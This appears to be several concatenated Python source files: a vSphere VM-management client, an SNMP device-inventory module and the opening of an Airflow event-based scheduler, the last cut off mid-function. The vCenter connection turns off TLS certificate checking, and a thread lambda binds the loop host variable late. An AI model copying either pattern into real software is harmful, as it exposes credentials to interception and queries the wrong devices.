progress_callback("{}".format(store[0].info.state))
except AttributeError:
pass
if store[0].info.state not in {"queued", "running"}:
return True
store[0] = self.system.get_updated_obj(store[0])
return False
wait_for(_check, num_sec=provision_timeout, delay=4)
if task.info.state != 'success':
self.logger.error(
"Clone VM from VM/template '%s' failed: %s",
self.name, get_task_error_message(task)
)
raise VMInstanceNotCloned(destination)
if template:
entity_cls = VMWareTemplate
else:
entity_cls = VMWareVirtualMachine
if relocate:
self.rename(destination)
return entity_cls(system=self.system, name=destination)
def add_disk(self, capacity_in_kb, provision_type=None, unit=None):
"""
Create a disk on the given datastore (by name)
Community Example used
https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/add_disk_to_vm.py
Return task type from Task.result or Task.error
https://github.com/vmware/pyvmomi/blob/master/docs/vim/TaskInfo.rst
Args:
capacity_in_kb (int): capacity of the new drive in Kilobytes
provision_type (string): 'thin' or 'thick', will default to thin if invalid option
unit (int): The unit number of the disk to add, use to override existing disk. Will
search for next available unit number by default
Returns:
(bool, task_result): Tuple containing boolean True if task ended in success,
and the contents of task.result or task.error depending on state
"""
provision_type = provision_type if provision_type in ['thick', 'thin'] else 'thin'
self.refresh()
# if passed unit matches existing device unit, match these values too
key = None
controller_key = None
unit_number = None
virtual_disk_devices = [
device for device
in self.raw.config.hardware.device if isinstance(device, vim.vm.device.VirtualDisk)]
for dev in virtual_disk_devices:
if unit == int(dev.unitNumber):
# user specified unit matching existing disk, match key too
key = dev.key
unit_number = unit or int(dev.unitNumber) + 1
if unit_number == 7: # reserved
unit_number += 1
controller_key = dev.controllerKey
if not (controller_key or unit_number):
raise ValueError('Could not identify VirtualDisk device on given vm')
# create disk backing specification
backing_spec = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
backing_spec.diskMode = 'persistent'
backing_spec.thinProvisioned = (provision_type == 'thin')
# create disk specification, attaching backing
disk_spec = vim.vm.device.VirtualDisk()
disk_spec.backing = backing_spec
disk_spec.unitNumber = unit_number
if key: # only set when overriding existing disk
disk_spec.key = key
disk_spec.controllerKey = controller_key
disk_spec.capacityInKB = capacity_in_kb
# create device specification, attaching disk
device_spec = vim.vm.device.VirtualDeviceSpec()
device_spec.fileOperation = 'create'
device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
device_spec.device = disk_spec
# create vm specification for device changes
vm_spec = vim.vm.ConfigSpec()
vm_spec.deviceChange = [device_spec]
# start vm reconfigure task
task = self.raw.ReconfigVM_Task(spec=vm_spec)
try:
wait_for(lambda: task.info.state not in ['running', 'queued'])
except TimedOutError:
self.logger.exception('Task did not go to success state: %s', task)
finally:
if task.info.state == 'success':
result = (True, task.info.result)
elif task.info.state == 'error':
result = (False, task.info.error)
else: # shouldn't happen
result = (None, None)
return result
class VMWareVirtualMachine(VMWareVMOrTemplate, Vm):
state_map = {
'poweredOn': VmState.RUNNING,
'poweredOff': VmState.STOPPED,
'suspended': VmState.SUSPENDED,
}
def refresh(self):
self.raw = self.system.get_vm(self._name, force=True).raw
return self.raw
def _get_state(self):
self.refresh()
return self._api_state_to_vmstate(str(self.raw.runtime.powerState))
@property
def ip(self):
ipv4_re = r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'
self.refresh()
try:
ip_address = self.raw.summary.guest.ipAddress
if not re.match(ipv4_re, ip_address) or ip_address == '127.0.0.1':
ip_address = None
return ip_address
except (AttributeError, TypeError):
# AttributeError: vm doesn't have an ip address yet
# TypeError: ip address wasn't a string
return None
@property
def creation_time(self):
"""Detect the vm_creation_time either via uptime if non-zero, or by last boot time
The API provides no sensible way to actually get this value. The only way in which
vcenter API MAY have this is by filtering through events
Return tz-naive datetime object
"""
vm = self.raw
filter_spec = vim.event.EventFilterSpec(
entity=vim.event.EventFilterSpec.ByEntity(
entity=vm, recursion=vim.event.EventFilterSpec.RecursionOption.self),
eventTypeId=['VmDeployedEvent', 'VmCreatedEvent'])
collector = self.system.content.eventManager.CreateCollectorForEvents(filter=filter_spec)
collector.SetCollectorPageSize(1000) # max allowed value
events = collector.latestPage
collector.DestroyCollector() # limited number of collectors allowed per client
if events:
creation_time = events.pop().createdTime # datetime object
else:
# no events found for VM, fallback to last boot time
creation_time = vm.runtime.bootTime
if not creation_time:
raise VMCreationDateError('Could not find a creation date for {}'.format(self.name))
# localize and make tz-naive
return creation_time.astimezone(pytz.UTC)
def start(self):
if self.is_running:
self.logger.info(" vSphere VM %s is already running", self.name)
return True
self.logger.info(" Starting vSphere VM %s", self.name)
self.raw.PowerOnVM_Task()
self.wait_for_state(VmState.RUNNING)
return True
def stop(self):
if self.is_stopped:
self.logger.info(" vSphere VM %s is already stopped", self.name)
return True
self.logger.info(" Stopping vSphere VM %s", self.name)
# resume VM if it is suspended
self.ensure_state(VmState.RUNNING)
self.raw.PowerOffVM_Task()
self.wait_for_state(VmState.STOPPED)
return True
def restart(self):
self.logger.info(" Restarting vSphere VM %s", self.name)
return self.stop() and self.start()
def suspend(self):
self.logger.info(" Suspending vSphere VM %s", self.name)
if self.is_stopped:
raise VMInstanceNotSuspended(self.name)
else:
self.raw.SuspendVM_Task()
self.wait_for_state(VmState.SUSPENDED)
return True
def delete(self):
self.ensure_state(VmState.STOPPED)
return super(VMWareVirtualMachine, self).delete()
def mark_as_template(self, template_name=None, **kwargs):
self.ensure_state(VmState.STOPPED)
self.raw.MarkAsTemplate()
template = VMWareTemplate(system=self.system, name=self.name, raw=self.raw)
template.refresh()
if template_name and template_name != template.name:
template.rename(template_name)
return template
def clone(self, vm_name, **kwargs):
kwargs['destination'] = vm_name
self.ensure_state(VmState.STOPPED)
return self._clone(**kwargs)
class VMWareTemplate(VMWareVMOrTemplate, Template):
def refresh(self):
self.raw = self.system.get_template(self._name, force=True).raw
return self.raw
def deploy(self, vm_name, timeout=1800, **kwargs):
"""
Clone a VM based on this template, wait for it to reach desired power state.
Returns a VMWareVirtualMachine object
"""
kwargs["power_on"] = kwargs.pop("power_on", True)
kwargs["template"] = False
start_timeout = kwargs.pop("start_timeout", 120)
new_vm = self._clone(vm_name, timeout=timeout, **kwargs)
if kwargs["power_on"]:
desired_state = VmState.RUNNING
else:
desired_state = VmState.STOPPED
new_vm.wait_for_state(desired_state, timeout=start_timeout)
return new_vm
class VMWareSystem(System, VmMixin, TemplateMixin):
"""Client to Vsphere API
Args:
hostname: The hostname of the system.
username: The username to connect with.
password: The password to connect with.
See also:
vSphere Management SDK API docs
https://developercenter.vmware.com/web/dp/doc/preview?id=155
"""
_api = None
_stats_available = {
'num_vm': lambda self: len(self.list_vms()),
'num_host': lambda self: len(self.list_host()),
'num_cluster': lambda self: len(self.list_cluster()),
'num_template': lambda self: len(self.list_templates()),
'num_datastore': lambda self: len(self.list_datastore()),
}
can_suspend = True
can_pause = False
def __init__(self, hostname, username, password, **kwargs):
super(VMWareSystem, self).__init__(**kwargs)
self.hostname = hostname
self.username = username
self.password = password
self._service_instance = None
self._content = None
self._vm_obj_cache = {} # stores pyvmomi vm obj's we have previously pulled
self.kwargs = kwargs
@property
def _identifying_attrs(self):
return {'hostname': self.hostname}
@property
def can_suspend(self):
return True
@property
def can_pause(self):
return False
def _start_keepalive(self):
"""
Send a 'current time' request to vCenter every 10 min as a
connection keep-alive
"""
def _keepalive():
while True:
self.logger.debug(
"vCenter keep-alive: %s", self.service_instance.CurrentTime()
)
time.sleep(600)
t = threading.Thread(target=_keepalive)
t.daemon = True
t.start()
def _create_service_instance(self):
"""
Create service instance and start a keep-alive thread
See https://github.com/vmware/pyvmomi/issues/347 for why this is needed.
"""
try:
# Disable SSL cert verification
context = ssl._create_unverified_context()
context.verify_mode = ssl.CERT_NONE
si = SmartConnect(
host=self.hostname,
user=self.username,
pwd=self.password,
sslContext=context
)
except Exception:
self.logger.error("Failed to connect to vCenter")
raise
# Disconnect at teardown
atexit.register(Disconnect, si)
self.logger.info(
"Connected to vCenter host %s as user %s",
self.hostname, self.username
)
self._start_keepalive()
return si
@threaded_cached_property
def service_instance(self):
"""An instance of the service"""
self.logger.debug("Attempting to initiate vCenter service instance")
return self._create_service_instance()
@threaded_cached_property
def content(self):
self.logger.debug("calling RetrieveContent()... this might take awhile")
return self.service_instance.RetrieveContent()
@property
def version(self):
"""The product version"""
return LooseVersion(self.content.about.version)
@property
def default_resource_pool(self):
return self.kwargs.get("default_resource_pool")
def get_obj_list(self, vimtype, folder=None):
"""Get a list of objects of type ``vimtype``"""
folder = folder or self.content.rootFolder
container = self.content.viewManager.CreateContainerView(folder, [vimtype], True)
return container.view
def get_obj(self, vimtype, name, folder=None):
"""Get an object of type ``vimtype`` with name ``name`` from Vsphere"""
obj = None
for item in self.get_obj_list(vimtype, folder):
if item.name == name:
obj = item
break
return obj
def _search_folders_for_vm(self, name):
# First get all VM folders
container = self.content.viewManager.CreateContainerView(
self.content.rootFolder, [vim.Folder], True)
folders = container.view
container.Destroy()
# Now search each folder for VM
vm = None
for folder in folders:
vm = self.content.searchIndex.FindChild(folder, name)
if vm:
break
return vm
def _build_filter_spec(self, begin_entity, property_spec):
"""Build a search spec for full inventory traversal, adapted from psphere"""
# Create selection specs
selection_specs = [vmodl.query.PropertyCollector.SelectionSpec(name=ss)
for ss in SELECTION_SPECS]
# Create traversal specs
traversal_specs = []
for spec_values in TRAVERSAL_SPECS:
spec = vmodl.query.PropertyCollector.TraversalSpec()
spec.name = spec_values['name']
spec.type = spec_values['type']
spec.path = spec_values['path']
if spec_values.get('select_indices'):
spec.selectSet = [selection_specs[i] for i in spec_values['select_indices']]
traversal_specs.append(spec)
# Create an object spec
obj_spec = vmodl.query.PropertyCollector.ObjectSpec()
obj_spec.obj = begin_entity
obj_spec.selectSet = traversal_specs
# Create a filter spec
filter_spec = vmodl.query.PropertyCollector.FilterSpec()
filter_spec.propSet = [property_spec]
filter_spec.objectSet = [obj_spec]
return filter_spec
def get_updated_obj(self, obj):
"""
Build a filter spec based on ``obj`` and return the updated object.
Args:
obj (pyVmomi.ManagedObject): The managed object to update, will be a specific subclass
"""
# Set up the filter specs
property_spec = vmodl.query.PropertyCollector.PropertySpec(type=type(obj), all=True)
object_spec = vmodl.query.PropertyCollector.ObjectSpec(obj=obj)
filter_spec = vmodl.query.PropertyCollector.FilterSpec()
filter_spec.propSet = [property_spec]
filter_spec.objectSet = [object_spec]
# Get updates based on the filter
property_collector = self.content.propertyCollector
try:
filter_ = property_collector.CreateFilter(filter_spec, True)
except vmodl.fault.ManagedObjectNotFound:
self.logger.warning('ManagedObjectNotFound when creating filter from spec {}'
.format(filter_spec))
return
update = property_collector.WaitForUpdates(None)
if not update or not update.filterSet or not update.filterSet[0]:
self.logger.warning('No object found when updating %s', str(obj))
return
if filter_:
filter_.Destroy()
return update.filterSet[0].objectSet[0].obj
def _get_vm_or_template(self, name, force=False):
"""
Find a VM or template with name 'name'
Instead of using self._get_obj, this uses more efficient ways of
searching for the VM since we can often have lots of VM's on the
provider to sort through.
Args:
name (string): The name of the VM/template
force (bool): Ignore the cache when updating
Returns:
VMWareVirtualMachine object, VMWareTemplate object, or None
"""
if not name:
raise ValueError('Invalid name: {}'.format(name))
if name not in self._vm_obj_cache or force:
self.logger.debug(
"Searching all vm folders for vm/template '%s'", name)
vm_obj = self._search_folders_for_vm(name)
if not vm_obj:
raise VMInstanceNotFound(name)
else:
vm_obj = self.get_updated_obj(self._vm_obj_cache[name])
# If vm_obj is not found, return None.
# Check if vm_obj.config is None as well, and also return None if that's the case.
# Reason:
#
# https://github.com/vmware/pyvmomi/blob/master/docs/vim/VirtualMachine.rst
# The virtual machine configuration is not guaranteed to be available
# For example, the configuration information would be unavailable if the
# server is unable to access the virtual machine files on disk, and is
# often also unavailable during the initial phases of virtual machine creation.
#
# In such cases, from a wrapanapi POV, we'll treat the VM as if it doesn't exist
if not vm_obj or not vm_obj.config:
return None
elif vm_obj.config.template:
entity_cls = VMWareTemplate
else:
entity_cls = VMWareVirtualMachine
self._vm_obj_cache[name] = vm_obj
return entity_cls(system=self, name=name, raw=vm_obj)
def get_vm(self, name, force=False):
vm = self._get_vm_or_template(name, force)
if not vm:
raise VMInstanceNotFound(name)
if isinstance(vm, VMWareTemplate):
raise Exception("Looking for VM but found template of name '{}'".format(name))
return vm
def _list_vms_or_templates(self, template=False, inaccessible=False):
"""
Obtains a list of all VMs or templates on the system.
Args:
template: A boolean describing if a list of templates should be returned
Returns: A list of vim.VirtualMachine objects
"""
# Use some pyVmomi internals to get vm propsets back directly with requested properties,
# so we skip the network overhead of returning full managed objects
property_spec = vmodl.query.PropertyCollector.PropertySpec()
property_spec.all = False
property_spec.pathSet = [
'name', 'config.template',
'config.uuid', 'runtime.connectionState'
]
property_spec.type = vim.VirtualMachine
pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
# Ensure get_template is either True or False to match the config.template property
get_template = bool(template)
# Select the vms or templates based on get_template and the returned properties
obj_list = []
for object_content in object_contents:
# Nested property lookups work, but the attr lookup on the
# vm object still triggers a request even though the vm
# object already "knows" the answer in its cached object
# content. So we just pull the value straight out of the cache.
vm_props = {p.name: p.val for p in object_content.propSet}
if vm_props.get('config.template') == get_template:
if (vm_props.get('runtime.connectionState') == "inaccessible" and
inaccessible) or vm_props.get(
'runtime.connectionState') != "inaccessible":
obj_list.append(vm_props['name'])
return obj_list
def get_vm_from_ip(self, ip):
""" Gets the name of a vm from its IP.
Args:
ip: The ip address of the vm.
Returns: The vm name for the corresponding IP."""
vms = self.content.searchIndex.FindAllByIp(ip=ip, vmSearch=True)
# As vsphere remembers the last IP a vm had, when we search we get all
# of them. Consequently we need to store them all in a dict and then sort
# them to find out which one has the latest boot time. I am going out on
# a limb and saying that searching for several vms and querying each object
# is quicker than finding all machines and recording the bootTime and ip address
# of each, before iterating through all of them to weed out the ones we care
# about, but I could be wrong.
boot_times = {}
for vm in vms:
if vm.name not in boot_times:
boot_times[vm.name] = datetime.fromtimestamp(0)
try:
boot_times[vm.name] = vm.summary.runtime.bootTime
except Exception:
pass
if boot_times:
newest_boot_time = sorted(boot_times.items(), key=operator.itemgetter(1),
reverse=True)[0]
newest_vm = newest_boot_time[0]
return VMWareVirtualMachine(system=self, name=newest_vm.name, raw=newest_vm)
else:
raise VMNotFoundViaIP('The requested IP is not known as a VM')
def is_host_connected(self, host_name):
host = self.get_obj(vim.HostSystem, name=host_name)
return host.summary.runtime.connectionState == "connected"
def create_vm(self, vm_name):
raise NotImplementedError('This function has not yet been implemented.')
def list_vms(self, inaccessible=False):
return [
VMWareVirtualMachine(system=self, name=obj_name)
for obj_name in self._list_vms_or_templates(inaccessible=inaccessible)
]
def find_vms(self, *args, **kwargs):
raise NotImplementedError
def list_templates(self):
return [
VMWareTemplate(system=self, name=obj_name)
for obj_name in self._list_vms_or_templates(template=True)
]
def find_templates(self, *args, **kwargs):
raise NotImplementedError
def create_template(self, *args, **kwargs):
raise NotImplementedError
def get_template(self, name, force=False):
vm = self._get_vm_or_template(name, force)
if not vm:
raise NotFoundError("template: {}".format(name))
if isinstance(vm, VMWareVirtualMachine):
raise Exception("Looking for template but found VM of name '{}'".format(name))
return vm
def list_host(self):
return [str(h.name) for h in self.get_obj_list(vim.HostSystem)]
def list_host_datastore_url(self, host_name):
host = self.get_obj(vim.HostSystem, name=host_name)
return [str(d.summary.url) for d in host.datastore]
def list_datastore(self):
return [str(h.name) for h in self.get_obj_list(vim.Datastore) if h.host]
def list_cluster(self):
return [str(h.name) for h in self.get_obj_list(vim.ClusterComputeResource)]
def list_resource_pools(self):
return [str(h.name) for h in self.get_obj_list(vim.ResourcePool)]
def list_networks(self):
"""Fetch the list of network names
Returns: A list of Network names
"""
return [str(h.name) for h in self.get_obj_list(vim.Network)]
def info(self):
# NOTE: Can't find these two methods in either psphere or suds
# return '{} {}'.format(self.api.get_server_type(), self.api.get_api_version())
return '{} {}'.format(self.content.about.apiType, self.content.about.apiVersion)
def disconnect(self):
pass
def _task_wait(self, task):
"""
Update a task and check its state. If the task state is not ``queued``, ``running`` or
``None``, then return the state. Otherwise return None.
Args:
task (pyVmomi.vim.Task): The task whose state is being monitored
Returns:
string: pyVmomi.vim.TaskInfo.state value if the task is not queued/running/None
"""
task = self.get_updated_obj(task)
if task.info.state not in ['queued', 'running', None]:
return task.info.state
def get_task_status(self, task):
"""Update a task and return its state, as a vim.TaskInfo.State string wrapper
Args:
task (pyVmomi.vim.Task): The task whose state is being returned
Returns:
string: pyVmomi.vim.TaskInfo.state value
"""
task = self.get_updated_obj(task)
return task.info.state
def remove_host_from_cluster(self, host_name):
host = self.get_obj(vim.HostSystem, name=host_name)
task = host.DisconnectHost_Task()
status, _ = wait_for(self._task_wait, [task])
if status != 'success':
raise HostNotRemoved("Host {} not removed: {}".format(
host_name, get_task_error_message(task)))
task = host.Destroy_Task()
status, _ = wait_for(self._task_wait, [task], fail_condition=None)
return status == 'success'
def usage_and_quota(self):
installed_ram = 0
installed_cpu = 0
used_ram = 0
used_cpu = 0
for host in self.get_obj_list(vim.HostSystem):
installed_ram += host.systemResources.config.memoryAllocation.limit
installed_cpu += host.summary.hardware.numCpuCores
property_spec = vmodl.query.PropertyCollector.PropertySpec()
property_spec.all = False
property_spec.pathSet = ['name', 'config.template']
property_spec.type = vim.VirtualMachine
pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
for vm in object_contents:
vm_props = {p.name: p.val for p in vm.propSet}
if vm_props.get('config.template'):
continue
if vm.obj.summary.runtime.powerState.lower() != 'poweredon':
continue
used_ram += vm.obj.summary.config.memorySizeMB
used_cpu += vm.obj.summary.config.numCpu
return {
# RAM
'ram_used': used_ram,
'ram_total': installed_ram,
'ram_limit': None,
# CPU
'cpu_used': used_cpu,
'cpu_total': installed_cpu,
'cpu_limit': None,
}
def get_network(self, network_name):
"""Fetch the network object from specified network name
Args:
network_name: The name of the network from Vmware
Returns: A object of vim.Network object
"""
network = self.get_obj(vimtype=vim.Network, name=network_name)
if not network:
raise NotFoundError
return network
|
DeviceManager.py
|
from threading import Thread
from queue import Queue
from easysnmp import Session
from config_app.backend.helpers import get_thread_output
from manage_app.backend import parse_model, static
class DeviceManager:
"""
This class is used to create multiple device objects by retrieving data via SNMP from all device in specified
network.
Constructor Positional Arguments:
- user -- django User model object
- available_hosts -- list of available IP addresses (network devices)
- snmp_config_id -- id which referees to initially provided SNMP configuration
"""
def __init__(self, user, available_hosts, snmp_config_id):
self.user = user
self.available_host = available_hosts
self.snmp_config_id = snmp_config_id
self.session_parameters = parse_model.parse_to_session_parameters(self.snmp_config_id)
def __get_single_device_details(self, hostname):
session = Session(hostname=hostname, **self.session_parameters)
device = Device(hostname, session)
return device
def get_multiple_device_details(self):
thread_list = list()
session_queue = Queue()
for host in self.available_host:
session_thread = Thread(target=lambda in_que, args: in_que.put(self.__get_single_device_details(host)),
args=(session_queue, host))
session_thread.start()
thread_list.append(session_thread)
devices_details_output = get_thread_output(session_queue, thread_list)
return devices_details_output
class DeviceSystem_:
"""
This class uses easysnmp session object to retrieve all SNMP system MIB data.
Constructor Positional Arguments:
- hostname -- IP address of connected device
- session -- easysnmp Session class instance
"""
def __init__(self, hostname, session):
self.system_description = session.get(('sysDescr', 0)).value
self.system_contact = session.get(('sysContact', 0)).value
self.full_system_name = session.get(('sysName', 0)).value
self.system_location = session.get(('sysLocation', 0)).value
self.system_up_time = session.get(('sysUpTime', 0)).value
self.hostname = hostname
class DeviceInterface_:
"""
This class uses easysnmp session object to retrieve all SNMP interface MIB data.
Constructor Positional Arguments:
- number -- interface number
- session -- easysnmp Session class instance
"""
def __init__(self, number, session):
self.interface_idx = session.get(('ifName', number)).oid_index
self.interface_name = session.get(('ifName', number)).value
self.interface_description = session.get(('ifDescr', number)).value
self.interface_type = session.get(('ifType', number)).value
self.interface_mtu = session.get(('ifMtu', number)).value
self.interface_speed = session.get(('ifSpeed', number)).value
self.interface_physical_addr = session.get(('ifPhysAddress', number)).value
self.interface_admin_status = session.get(('ifAdminStatus', number)).value
self.interface_operational_status = session.get(('ifOperStatus', number)).value
self.interface_in_unicast_packets = session.get(('ifInUcastPkts', number)).value
self.interface_in_errors = session.get(('ifInErrors', number)).value
self.interface_out_unicast_packets = session.get(('ifOutUcastPkts', number)).value
self.interface_out_errors = session.get(('ifOutErrors', number)).value
self.lldp_neighbor_name = None
self.lldp_neighbor_interface = None
self.interface_ip = None
ip_addresses = session.walk('ipAdEntIfIndex')
for snmp_query in ip_addresses:
if snmp_query.value == self.interface_idx:
self.interface_ip = snmp_query.oid_index
class Device:
"""
This class both DeviceInterface_ and DeviceSystem_ classes to merge together all the data and create one final
Device object with neighbor details as well.
Constructor Positional Arguments:
- hostname -- IP address of connected device
- session -- easysnmp Session class instance
"""
def __init__(self, hostname, session):
self.hostname = hostname
self.session = session
self.system = DeviceSystem_(self.hostname, self.session)
self.if_number = int(self.session.get(('ifNumber', 0)).value)
self.interfaces = [DeviceInterface_(number, self.session) for number in range(1, self.if_number + 1)]
self.lldp_data = self.__get_lldp_entries()
def __get_lldp_entries(self):
# THIS FUNCTION WORKS WRONG WHEN INT DESCRIPTIONS ARE ADDED - SOME BACKEND ISSUES WITH EASYSNMP WALK !!!
lldp_remote_systems_data = self.session.walk(static.lldp_defined_values['lldpRemoteSystemsData'])
lldp_remote_query = {
'lldp_neighbor_interfaces': list(),
'lldp_neighbor_hostnames': list(),
}
for item in lldp_remote_systems_data:
if static.lldp_defined_values['lldpNeighborInterface'] in item.oid:
lldp_remote_query['lldp_neighbor_interfaces'].append(item.value)
elif static.lldp_defined_values['lldpNeighborHostName'] in item.oid:
lldp_remote_query['lldp_neighbor_hostnames'].append(item.value)
lldp_neighbor_correlation = zip(lldp_remote_query['lldp_neighbor_interfaces'],
lldp_remote_query['lldp_neighbor_hostnames'])
lldp_final_correlation = dict()
for lldp_neighbor_interface, lldp_neigbor_hostname in lldp_neighbor_correlation:
lldp_final_correlation[lldp_neigbor_hostname] = lldp_neighbor_interface
lldp_final_query = {
self.system.full_system_name: lldp_final_correlation
}
return lldp_final_query
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
notification_server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.notification_server_uri = notification_server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
self._schedule_task(event)
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
self._handle_task_status_changed(dagrun, event, session)
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
event.execution_date))
elif isinstance(event, DagRunCreatedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
if DagModel.dag_needing_dagruns(session, event.dag_id):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, run_id:{}".format(
event.dag_id, event.dag_run_id))
else:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._stop_scheduling_periodic_tasks(event.dag_id, event.execution_date)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
if len(dag_runs) < 1:
self.log.warning("DagRun not found by dag_id:{}, execution_date:{}".format(
event.dag_id, event.execution_date))
else:
dag_run = dag_runs[0]
if dag_run.get_state() == State.RUNNING:
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
else:
self.periodic_manager.remove_task(dag_id=event.dag_id,
execution_date=event.execution_date,
task_id=event.task_id)
self.log.info("Dag run's state is not running(dag_id:{} execution_date: {}), "
"so stop periodic scheduling task(id: {})".format(event.dag_id,
str(event.execution_date),
event.task_id))
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
ti = dagrun.get_task_instance(task_id=event.task_id)
if event.try_number == ti.try_number:
if State.UP_FOR_RETRY == event.state:
dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
ti.task = dag.get_task(ti.task_id)
next_retry_datetime = ti.next_retry_datetime()
